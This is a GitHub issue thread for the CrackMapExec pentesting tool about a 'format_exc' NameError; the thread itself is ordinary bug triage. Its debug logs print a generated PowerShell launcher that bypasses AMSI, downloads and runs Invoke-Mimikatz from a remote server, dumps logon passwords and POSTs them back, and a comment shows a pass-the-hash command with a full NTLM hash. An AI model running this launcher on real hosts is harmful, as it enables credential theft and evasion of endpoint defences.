search

byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.38k stars 1.64k forks source link

NameError: global name 'format_exc' is not defined #221

Closed trietptm closed 6 years ago

trietptm commented 6 years ago

Steps to reproduce

  1. Run CrackMapExec with module mimikatz and --local-auth and NTLM-relaying in an AD

Command string used

cme smb -u admin -H --local-auth -M mimikatz OR cme smb -u admin -H --local-auth -x whoami

CME verbose output (using the --verbose flag)

DEBUG Passed args: {'clear_obfscripts': False, 'content': False, 'cred_id': [], 'darrell': False, 'depth': None, 'disks': False, 'domain': None, 'exclude_dirs': '', 'exec_method': None, 'execute': None, 'fail_limit': None, 'force_ps32': False, 'gen_relay_list': None, 'gfail_limit': None, 'groups': None, 'hash': [''], 'jitter': None, 'list_modules': False, 'local_auth': True, 'local_groups': None, 'loggedon_users': False, 'lsa': False, 'module': 'mimikatz', 'module_options': [], 'no_output': False, 'ntds': None, 'obfs': False, 'only_files': False, 'pass_pol': False, 'password': [], 'pattern': None, 'port': 445, 'protocol': 'smb', 'ps_execute': None, 'regex': None, 'rid_brute': None, 'sam': False, 'server': 'https', 'server_host': '0.0.0.0', 'server_port': None, 'sessions': False, 'share': 'C$', 'shares': False, 'show_module_options': False, 'spider': None, 'spider_folder': '.', 'target': [''], 'threads': 100, 'timeout': None, 'ufail_limit': None, 'username': ['itadmin'], 'users': None, 'verbose': True, 'wmi': None, 'wmi_namespace': 'root\cimv2'} DEBUG CME server type: https SMB 445 [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:) (domain:) (signing:False) (SMBv1:True) DEBUG add_credential(credtype=hash, domain=), username=admin, password=, groupid=None, pillaged_from=None) => None SMB 445 [+] \admin (Pwn3d!) DEBUG Generated PS IEX Launcher: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} IEX (New-Object Net.WebClient).DownloadString('https://:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()

DEBUG Generated PS command: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} IEX (New-Object Net.WebClient).DownloadString('https://:443/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('https://:443/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse()

DEBUG Error executing command via wmiexec, traceback: Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/gevent/greenlet.py", line 536, in run result = self._run(*self.args, self.kwargs) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 108, in init connection.init(self, args, db, host) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 41, in init self.proto_flow() File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 75, in proto_flow self.call_modules() File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 105, in call_modules self.module.on_admin_login(context, self) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/modules/mimikatz.py", line 34, in on_admin_login connection.ps_execute(launcher) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator return func(self, *args, *kwargs) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 445, in ps_execute return self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator return func(self, args, kwargs) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 81, in _decorator output = func(self, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 394, in execute logging.debug(format_exc()) NameError: global name 'format_exc' is not defined Thu Nov 30 14:01:29 2017 <Greenlet at 0x7f85d4095b90: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database instance at 0x7f85d4a2e320>, '')> failed with NameError

CME Version (cme --version)

4.0.1dev - Bug Pr0n

OS

Kali Linux latest updated

Target OS

Windows 7 Professional 7601 Service Pack 1 x64

Detailed issue explanation

trietptm commented 6 years ago

When I uncomment "from traceback import format_exc" in https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/connection.py , it runs indefinitely.

impinchi commented 6 years ago

Hi, I have the same issue with the below command using latest git clone and a clean db

cme --verbose smb IP -u administrator -H HASH -x whoami

output:

CrackMapExec# cme --verbose smb 10.11.1.227 -u administrator -H 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af -x whoami DEBUG Passed args: {'clear_obfscripts': False, 'content': False, 'cred_id': [], 'darrell': False, 'depth': None, 'disks': False, 'domain': None, 'exclude_dirs': '', 'exec_method': None, 'execute': 'whoami', 'fail_limit': None, 'force_ps32': False, 'gen_relay_list': None, 'gfail_limit': None, 'groups': None, 'hash': ['7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af'], 'jitter': None, 'list_modules': False, 'local_auth': False, 'local_groups': None, 'loggedon_users': False, 'lsa': False, 'module': None, 'module_options': [], 'no_output': False, 'ntds': None, 'obfs': False, 'only_files': False, 'pass_pol': False, 'password': [], 'pattern': None, 'port': 445, 'protocol': 'smb', 'ps_execute': None, 'regex': None, 'rid_brute': None, 'sam': False, 'server': 'https', 'server_host': '0.0.0.0', 'server_port': None, 'sessions': False, 'share': 'C$', 'shares': False, 'show_module_options': False, 'spider': None, 'spider_folder': '.', 'target': ['10.11.1.227'], 'threads': 100, 'timeout': None, 'ufail_limit': None, 'username': ['administrator'], 'users': None, 'verbose': True, 'wmi': None, 'wmi_namespace': 'root\cimv2'} SMB 10.11.1.227 445 JD [] Windows 5.0 x32 (name:JD) (domain:JD) (signing:False) (SMBv1:True) DEBUG add_credential(credtype=hash, domain=JD, username=administrator, password=7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af, groupid=None, pillaged_from=None) => None SMB 10.11.1.227 445 JD [+] JD\administrator 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af (Pwn3d!) DEBUG Calling execute() DEBUG Starting SMB server DEBUG Config file parsed DEBUG Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 DEBUG Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 DEBUG Config file parsed DEBUG Config file parsed DEBUG Config file parsed DEBUG Error executing command via wmiexec, traceback: Traceback (most recent call last): File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run result = self._run(self.args, self.kwargs) File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 108, in init connection.init(self, args, db, host) File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 41, in init self.proto_flow() File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 77, in proto_flow self.call_cmd_args() File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 84, in call_cmd_args getattr(self, k)() File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/connection.py", line 17, in _decorator return func(self, *args, *kwargs) File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 81, in _decorator output = func(self, args, kwargs) File "/root/.local/share/virtualenvs/CrackMapExec-0MeuY4Pr/local/lib/python2.7/site-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/protocols/smb.py", line 394, in execute logging.debug(format_exc()) NameError: global name 'format_exc' is not defined Sun Dec 31 09:50:08 2017 <Greenlet at 0xb6c97accL: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database instance at 0xb6b7edec>, 'IP')> failed with NameError

byt3bl33d3r commented 6 years ago

Resolved in #237. If not comment below.